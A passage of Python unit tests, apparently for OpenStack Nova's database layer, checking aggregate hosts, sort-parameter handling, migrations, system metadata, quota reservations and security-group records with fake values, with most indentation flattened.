ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(_get_fake_aggr_hosts(), expected)
def test_aggregate_host_re_add(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
host = _get_fake_aggr_hosts()[0]
db.aggregate_host_delete(ctxt, result['id'], host)
db.aggregate_host_add(ctxt, result['id'], host)
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(len(expected), 1)
def test_aggregate_host_add_duplicate_works(self):
ctxt = context.get_admin_context()
r1 = _create_aggregate_with_hosts(context=ctxt, metadata=None)
r2 = _create_aggregate_with_hosts(ctxt,
values={'name': 'fake_aggregate2'},
metadata={'availability_zone': 'fake_avail_zone2'})
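        # Both aggregates were created with the default host list, so a host
        # may appear in more than one aggregate and both report the same
        # hosts.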
h1 = db.aggregate_host_get_all(ctxt, r1['id'])
h2 = db.aggregate_host_get_all(ctxt, r2['id'])
self.assertEqual(h1, h2)
def test_aggregate_host_add_duplicate_raise_exist_exc(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
self.assertRaises(exception.AggregateHostExists,
db.aggregate_host_add,
ctxt, result['id'], _get_fake_aggr_hosts()[0])
def test_aggregate_host_add_raise_not_found(self):
ctxt = context.get_admin_context()
# this does not exist!
aggregate_id = 1
host = _get_fake_aggr_hosts()[0]
self.assertRaises(exception.AggregateNotFound,
db.aggregate_host_add,
ctxt, aggregate_id, host)
def test_aggregate_host_delete(self):
ctxt = context.get_admin_context()
result = _create_aggregate_with_hosts(context=ctxt, metadata=None)
db.aggregate_host_delete(ctxt, result['id'],
_get_fake_aggr_hosts()[0])
expected = db.aggregate_host_get_all(ctxt, result['id'])
self.assertEqual(0, len(expected))
def test_aggregate_host_delete_raise_not_found(self):
ctxt = context.get_admin_context()
result = _create_aggregate(context=ctxt)
self.assertRaises(exception.AggregateHostNotFound,
db.aggregate_host_delete,
ctxt, result['id'], _get_fake_aggr_hosts()[0])


class SqlAlchemyDbApiNoDbTestCase(test.NoDBTestCase):
"""No-DB test class for simple test cases that do not require a backend."""
def test_manual_join_columns_immutable_list(self):
# Tests that _manual_join_columns doesn't modify the list passed in.
columns_to_join = ['system_metadata', 'test']
manual_joins, columns_to_join2 = (
sqlalchemy_api._manual_join_columns(columns_to_join))
self.assertEqual(['system_metadata'], manual_joins)
self.assertEqual(['test'], columns_to_join2)
self.assertEqual(['system_metadata', 'test'], columns_to_join)


class SqlAlchemyDbApiTestCase(DbTestCase):
def test_instance_get_all_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
def test_instance_get_all_uuids_by_host(self):
ctxt = context.get_admin_context()
self.create_instance_with_args()
self.create_instance_with_args()
self.create_instance_with_args(host='host2')
result = sqlalchemy_api._instance_get_all_uuids_by_host(ctxt, 'host1')
self.assertEqual(2, len(result))
self.assertEqual(types.UnicodeType, type(result[0]))
def test_instance_get_active_by_window_joined(self):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
start_time = now - datetime.timedelta(minutes=10)
now1 = now + datetime.timedelta(minutes=1)
now2 = now + datetime.timedelta(minutes=2)
now3 = now + datetime.timedelta(minutes=3)
ctxt = context.get_admin_context()
# used for testing columns_to_join
network_info = jsonutils.dumps({'ckey': 'cvalue'})
sample_data = {
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'network_info': network_info},
}
self.create_instance_with_args(launched_at=now, **sample_data)
self.create_instance_with_args(launched_at=now1, terminated_at=now2,
**sample_data)
self.create_instance_with_args(launched_at=now2, terminated_at=now3,
**sample_data)
self.create_instance_with_args(launched_at=now3, terminated_at=None,
**sample_data)
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now)
self.assertEqual(4, len(result))
# verify that all default columns are joined
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now3, columns_to_join=['info_cache'])
self.assertEqual(2, len(result))
# verify that only info_cache is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
self.assertIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now)
self.assertEqual(0, len(result))
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=start_time, end=now2,
columns_to_join=['system_metadata'])
self.assertEqual(2, len(result))
# verify that only system_metadata is loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual({}, meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual(sample_data['system_metadata'], sys_meta)
self.assertNotIn('info_cache', result[0])
result = sqlalchemy_api.instance_get_active_by_window_joined(
ctxt, begin=now2, end=now3,
columns_to_join=['metadata', 'info_cache'])
self.assertEqual(2, len(result))
# verify that only metadata and info_cache are loaded
meta = utils.metadata_to_dict(result[0]['metadata'])
self.assertEqual(sample_data['metadata'], meta)
sys_meta = utils.metadata_to_dict(result[0]['system_metadata'])
self.assertEqual({}, sys_meta)
self.assertIn('info_cache', result[0])
self.assertEqual(network_info, result[0]['info_cache']['network_info'])
@mock.patch('nova.db.sqlalchemy.api.instance_get_all_by_filters_sort')
def test_instance_get_all_by_filters_calls_sort(self,
mock_get_all_filters_sort):
'''Verifies instance_get_all_by_filters calls the sort function.'''
# sort parameters should be wrapped in a list, all other parameters
# should be passed through
ctxt = context.get_admin_context()
sqlalchemy_api.instance_get_all_by_filters(ctxt, {'foo': 'bar'},
'sort_key', 'sort_dir', limit=100, marker='uuid',
columns_to_join='columns', use_slave=True)
mock_get_all_filters_sort.assert_called_once_with(ctxt, {'foo': 'bar'},
limit=100, marker='uuid', columns_to_join='columns',
use_slave=True, sort_keys=['sort_key'], sort_dirs=['sort_dir'])


class ProcessSortParamTestCase(test.TestCase):
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
        # The default direction is the first entry in the sort direction list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)


class MigrationTestCase(test.TestCase):
def setUp(self):
super(MigrationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
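        # Seed a mix of migrations: two in progress between host1/a and
        # host2/b, three completed (reverted/confirmed/error), and some
        # in-progress ones between other host/node pairs.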
self._create()
self._create()
self._create(status='reverted')
self._create(status='confirmed')
self._create(status='error')
self._create(source_compute='host2', source_node='b',
dest_compute='host1', dest_node='a')
self._create(source_compute='host2', dest_compute='host3')
self._create(source_compute='host3', dest_compute='host4')
def _create(self, status='migrating', source_compute='host1',
source_node='a', dest_compute='host2', dest_node='b',
system_metadata=None):
values = {'host': source_compute}
instance = db.instance_create(self.ctxt, values)
if system_metadata:
db.instance_system_metadata_update(self.ctxt, instance['uuid'],
system_metadata, False)
values = {'status': status, 'source_compute': source_compute,
'source_node': source_node, 'dest_compute': dest_compute,
'dest_node': dest_node, 'instance_uuid': instance['uuid']}
db.migration_create(self.ctxt, values)
def _assert_in_progress(self, migrations):
for migration in migrations:
self.assertNotEqual('confirmed', migration['status'])
self.assertNotEqual('reverted', migration['status'])
self.assertNotEqual('error', migration['status'])
def test_migration_get_in_progress_joins(self):
self._create(source_compute='foo', system_metadata={'foo': 'bar'})
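        # The migration rows should come back with the instance and its
        # system_metadata joined.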
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'foo', 'a')
system_metadata = migrations[0]['instance']['system_metadata'][0]
self.assertEqual(system_metadata['key'], 'foo')
self.assertEqual(system_metadata['value'], 'bar')
def test_in_progress_host1_nodea(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'a')
# 2 as source + 1 as dest
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_in_progress_host1_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host1', 'b')
# some migrations are to/from host1, but none with a node 'b'
self.assertEqual(0, len(migrations))
def test_in_progress_host2_nodeb(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
# 2 as dest, 1 as source
self.assertEqual(3, len(migrations))
self._assert_in_progress(migrations)
def test_instance_join(self):
migrations = db.migration_get_in_progress_by_host_and_node(self.ctxt,
'host2', 'b')
for migration in migrations:
instance = migration['instance']
self.assertEqual(migration['instance_uuid'], instance['uuid'])
def test_get_migrations_by_filters(self):
filters = {"status": "migrating", "host": "host3"}
migrations = db.migration_get_all_by_filters(self.ctxt, filters)
self.assertEqual(2, len(migrations))
for migration in migrations:
self.assertEqual(filters["status"], migration['status'])
hosts = [migration['source_compute'], migration['dest_compute']]
self.assertIn(filters["host"], hosts)
def test_only_admin_can_get_all_migrations_by_filters(self):
user_ctxt = context.RequestContext(user_id=None, project_id=None,
is_admin=False, read_deleted="no",
overwrite=False)
self.assertRaises(exception.AdminRequired,
db.migration_get_all_by_filters, user_ctxt, {})
def test_migration_get_unconfirmed_by_dest_compute(self):
# Ensure no migrations are returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
        # Ensure no migrations are returned for fake_host2 either.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(0, len(results))
updated_at = datetime.datetime(2000, 1, 1, 12, 0, 0)
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
# Ensure different host is not returned
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host')
self.assertEqual(0, len(results))
# Ensure one migration older than 10 seconds is returned.
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
'fake_host2')
self.assertEqual(1, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
# Ensure the new migration is not returned.
updated_at = timeutils.utcnow()
values = {"status": "finished", "updated_at": updated_at,
"dest_compute": "fake_host2"}
migration = db.migration_create(self.ctxt, values)
results = db.migration_get_unconfirmed_by_dest_compute(self.ctxt, 10,
"fake_host2")
self.assertEqual(0, len(results))
db.migration_update(self.ctxt, migration['id'],
{"status": "CONFIRMED"})
def test_migration_update_not_found(self):
self.assertRaises(exception.MigrationNotFound,
db.migration_update, self.ctxt, 42, {})


class ModelsObjectComparatorMixin(object):
def _dict_from_object(self, obj, ignored_keys):
if ignored_keys is None:
ignored_keys = []
return {k: v for k, v in obj.iteritems()
if k not in ignored_keys}
def _assertEqualObjects(self, obj1, obj2, ignored_keys=None):
obj1 = self._dict_from_object(obj1, ignored_keys)
obj2 = self._dict_from_object(obj2, ignored_keys)
self.assertEqual(len(obj1),
len(obj2),
"Keys mismatch: %s" %
str(set(obj1.keys()) ^ set(obj2.keys())))
for key, value in obj1.iteritems():
self.assertEqual(value, obj2[key])
def _assertEqualListsOfObjects(self, objs1, objs2, ignored_keys=None):
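        # Compare as dicts sorted by their values so that list ordering is
        # ignored.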
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
sort_key = lambda d: [d[k] for k in sorted(d)]
conv_and_sort = lambda obj: sorted(map(obj_to_dict, obj), key=sort_key)
self.assertEqual(conv_and_sort(objs1), conv_and_sort(objs2))
def _assertEqualOrderedListOfObjects(self, objs1, objs2,
ignored_keys=None):
obj_to_dict = lambda o: self._dict_from_object(o, ignored_keys)
conv = lambda obj: map(obj_to_dict, obj)
self.assertEqual(conv(objs1), conv(objs2))
def _assertEqualListsOfPrimitivesAsSets(self, primitives1, primitives2):
self.assertEqual(len(primitives1), len(primitives2))
for primitive in primitives1:
self.assertIn(primitive, primitives2)
for primitive in primitives2:
self.assertIn(primitive, primitives1)


class InstanceSystemMetadataTestCase(test.TestCase):
"""Tests for db.api.instance_system_metadata_* methods."""
def setUp(self):
super(InstanceSystemMetadataTestCase, self).setUp()
values = {'host': 'h1', 'project_id': 'p1',
'system_metadata': {'key': 'value'}}
self.ctxt = context.get_admin_context()
self.instance = db.instance_create(self.ctxt, values)
def test_instance_system_metadata_get(self):
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value'})
def test_instance_system_metadata_update_new_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, False)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'value', 'new_key': 'new_value'})
def test_instance_system_metadata_update_existent_pair(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'key': 'new_value'})
def test_instance_system_metadata_update_delete_true(self):
db.instance_system_metadata_update(
self.ctxt, self.instance['uuid'],
{'new_key': 'new_value'}, True)
metadata = db.instance_system_metadata_get(self.ctxt,
self.instance['uuid'])
self.assertEqual(metadata, {'new_key': 'new_value'})
@test.testtools.skip("bug 1189462")
def test_instance_system_metadata_update_nonexistent(self):
self.assertRaises(exception.InstanceNotFound,
db.instance_system_metadata_update,
self.ctxt, 'nonexistent-uuid',
{'key': 'value'}, True)


class ReservationTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(ReservationTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
usage = db.quota_usage_get(self.ctxt, 'project1', 'resource1', 'user1')
self.values = {'uuid': 'sample-uuid',
'project_id': 'project1',
'user_id': 'user1',
'resource': 'resource1',
'delta': 42,
'expire': timeutils.utcnow() + datetime.timedelta(days=1),
'usage': {'id': usage.id}}
def test_reservation_commit(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
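        # Committing should remove the reservations and fold the reserved
        # amounts into in_use.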
db.reservation_commit(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 2},
'fixed_ips': {'reserved': 0, 'in_use': 4}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_rollback(self):
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 1, 'in_use': 1},
'fixed_ips': {'reserved': 2, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
_reservation_get(self.ctxt, self.reservations[0])
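        # Rolling back should remove the reservations and drop the reserved
        # amounts without touching in_use.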
db.reservation_rollback(self.ctxt, self.reservations, 'project1',
'user1')
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, self.reservations[0])
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))
def test_reservation_expire(self):
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1', 'user_id': 'user1',
'resource0': {'reserved': 0, 'in_use': 0},
'resource1': {'reserved': 0, 'in_use': 1},
'fixed_ips': {'reserved': 0, 'in_use': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'))


class SecurityGroupRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _get_base_rule_values(self):
return {
'protocol': "tcp",
'from_port': 80,
'to_port': 8080,
'cidr': None,
'deleted': 0,
'deleted_at': None,
'grantee_group': None,
'updated_at': None
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def _create_security_group_rule(self, values):
v = self._get_base_rule_values()
v.update(values)
return db.security_group_rule_create(self.ctxt, v)
def test_security_group_rule_create(self):
security_group_rule = self._create_security_group_rule({})
self.assertIsNotNone(security_group_rule['id'])
for key, value in self._get_base_rule_values().items():
self.assertEqual(value, security_group_rule[key])
def _test_security_group_rule_get_by_security_group(self, columns=None):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
security_group = self._create_security_group({
'instances': [instance]})
security_group_rule = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
security_group_rule1 = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
found_rules = db.security_group_rule_get_by_security_group(
self.ctxt, security_group['id'], columns_to_join=columns)
self.assertEqual(len(found_rules), 2)
rules_ids = [security_group_rule['id'], security_group_rule1['id']]
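        # With the default joins the grantee group, its instances and their
        # system_metadata are eagerly loaded; with an explicit empty column
        # list they are not.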
for rule in found_rules:
if columns is None:
self.assertIn('grantee_group', dict(rule.iteritems()))
self.assertIn('instances',
dict(rule.grantee_group.iteritems()))
self.assertIn(
'system_metadata',
dict(rule.grantee_group.instances[0].iteritems()))
self.assertIn(rule['id'], rules_ids)
else:
self.assertNotIn('grantee_group', dict(rule.iteritems()))
def test_security_group_rule_get_by_security_group(self):
self._test_security_group_rule_get_by_security_group()
def test_security_group_rule_get_by_security_group_no_joins(self):
self._test_security_group_rule_get_by_security_group(columns=[])
def test_security_group_rule_get_by_security_group_grantee(self):
security_group = self._create_security_group({})
security_group_rule = self._create_security_group_rule(
{'grantee_group': security_group})
rules = db.security_group_rule_get_by_security_group_grantee(self.ctxt,
security_group['id'])
self.assertEqual(len(rules), 1)
self.assertEqual(rules[0]['id'], security_group_rule['id'])
def test_security_group_rule_destroy(self):
self._create_security_group({'name': 'fake1'})
self._create_security_group({'name': 'fake2'})
security_group_rule1 = self._create_security_group_rule({})
security_group_rule2 = self._create_security_group_rule({})
db.security_group_rule_destroy(self.ctxt, security_group_rule1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get,
self.ctxt, security_group_rule1['id'])
self._assertEqualObjects(db.security_group_rule_get(self.ctxt,
security_group_rule2['id']),
security_group_rule2, ['grantee_group'])
def test_security_group_rule_destroy_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_destroy, self.ctxt, 100500)
def test_security_group_rule_get(self):
security_group_rule1 = (
self._create_security_group_rule({}))
self._create_security_group_rule({})
real_security_group_rule = db.security_group_rule_get(self.ctxt,
security_group_rule1['id'])
self._assertEqualObjects(security_group_rule1,
real_security_group_rule, ['grantee_group'])
def test_security_group_rule_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get, self.ctxt, 100500)
def test_security_group_rule_count_by_group(self):
sg1 = self._create_security_group({'name': 'fake1'})
sg2 = self._create_security_group({'name': 'fake2'})
rules_by_group = {sg1: [], sg2: []}
for group in rules_by_group:
rules = rules_by_group[group]
for i in range(0, 10):
rules.append(
self._create_security_group_rule({'parent_group_id':
group['id']}))
db.security_group_rule_destroy(self.ctxt,
rules_by_group[sg1][0]['id'])
counted_groups = [db.security_group_rule_count_by_group(self.ctxt,
group['id'])
for group in [sg1, sg2]]
expected = [9, 10]
self.assertEqual(counted_groups, expected)


class SecurityGroupTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def test_security_group_create(self):
security_group = self._create_security_group({})
self.assertIsNotNone(security_group['id'])
for key, value in self._get_base_values().iteritems():
self.assertEqual(value, security_group[key])
def test_security_group_destroy(self):
security_group1 = self._create_security_group({})
security_group2 = \
self._create_security_group({'name': 'fake_sec_group2'})
db.security_group_destroy(self.ctxt, security_group1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get,
self.ctxt, security_group1['id'])
self._assertEqualObjects(db.security_group_get(
self.ctxt, security_group2['id'],
columns_to_join=['instances']), security_group2)
def test_security_group_get(self):
security_group1 = self._create_security_group({})
self._create_security_group({'name': 'fake_sec_group2'})
real_security_group = db.security_group_get(self.ctxt,
security_group1['id'],
columns_to_join=['instances'])
self._assertEqualObjects(security_group1,
real_security_group)
def test_security_group_get_with_instance_columns(self):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
secgroup = self._create_security_group({'instances': [instance]})
secgroup = db.security_group_get(
self.ctxt, secgroup['id'],
columns_to_join=['instances.system_metadata'])
inst = secgroup.instances[0]
self.assertIn('system_metadata', dict(inst.iteritems()).keys())
def test_security_group_get_no_instances(self):
instance = db.instance_create(self.ctxt, {})
sid = self._create_security_group({'instances': [instance]})['id']
security_group = db.security_group_get(self.ctxt, sid,
columns_to_join=['instances'])
self.assertIn('instances', security_group.__dict__)
security_group = db.security_group_get(self.ctxt, sid)
self.assertNotIn('instances', security_group.__dict__)
def test_security_group_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get, self.ctxt, 100500)
def test_security_group_get_by_name(self):
security_group1 = self._create_security_group({'name': 'fake1'})
security_group2 = self._create_security_group({'name': 'fake2'})
real_security_group1 = db.security_group_get_by_name(
self.ctxt,
security_group1['project_id'],
security_group1['name'],
columns_to_join=None)
real_security_group2 = db.security_group_get_by_name(
self.ctxt,
security_group2['project_id'],
security_group2['name'],
columns_to_join=None)
self._assertEqualObjects(security_group1, real_security_group1)
self._assertEqualObjects(security_group2, real_security_group2)
def test_security_group_get_by_project(self):
security_group1 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake2', 'project_id': 'fake_proj2'})
real1 = db.security_group_get_by_project(
self.ctxt,
security_group1['project_id'])
real2 = db.security_group_get_by_project(
self.ctxt,
security_group2['project_id'])
expected1, expected2 = [security_group1], [security_group2]
self._assertEqualListsOfObjects(expected1, real1,
ignored_keys=['instances'])
self._assertEqualListsOfObjects(expected2, real2,
ignored_keys=['instances'])
def test_security_group_get_by_instance(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'name': 'fake1', 'instances': [instance]},
{'name': 'fake2', 'instances': [instance]},
{'name': 'fake3', 'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_by_instance(self.ctxt,
instance['uuid'])
expected = security_groups[:2]
self._assertEqualListsOfObjects(expected, real,
ignored_keys=['instances'])
def test_security_group_get_all(self):
values = [
{'name': 'fake1', 'project_id': 'fake_proj1'},
{'name': 'fake2', 'project_id': 'fake_proj2'},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_all(self.ctxt)
self._assertEqualListsOfObjects(security_groups, real,
ignored_keys=['instances'])
def test_security_group_in_use(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'instances': [instance],
'name': 'fake_in_use'},
{'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = []
for security_group in security_groups:
in_use = db.security_group_in_use(self.ctxt,
security_group['id'])
real.append(in_use)
expected = [True, False]
self.assertEqual(expected, real)
def test_security_group_ensure_default(self):
self.ctxt.project_id = 'fake'
self.ctxt.user_id = 'fake'
self.assertEqual(0, len(db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)))
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
self.assertEqual("default", security_groups[0]["name"])
usage = db.quota_usage_get(self.ctxt,
self.ctxt.project_id,
'security_groups',
self.ctxt.user_id)
self.assertEqual(1, usage.in_use)
@mock.patch.object(db.sqlalchemy.api, '_security_group_get_by_names')
def test_security_group_ensure_default_called_concurrently(self, sg_mock):
        # make sure NotFound is always raised here to trick Nova into
        # inserting the duplicate security group entry
sg_mock.side_effect = exception.NotFound
# create the first db entry
self.ctxt.project_id = 1
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
# create the second one and ensure the exception is handled properly
default_group = db.security_group_ensure_default(self.ctxt)
self.assertEqual('default', default_group.name)
def test_security_group_update(self):
security_group = self._create_security_group({})
new_values = {
'name': 'sec_group1',
'description': 'sec_group_descr1',
'user_id': 'fake_user1',
'project_id': 'fake_proj1',
}
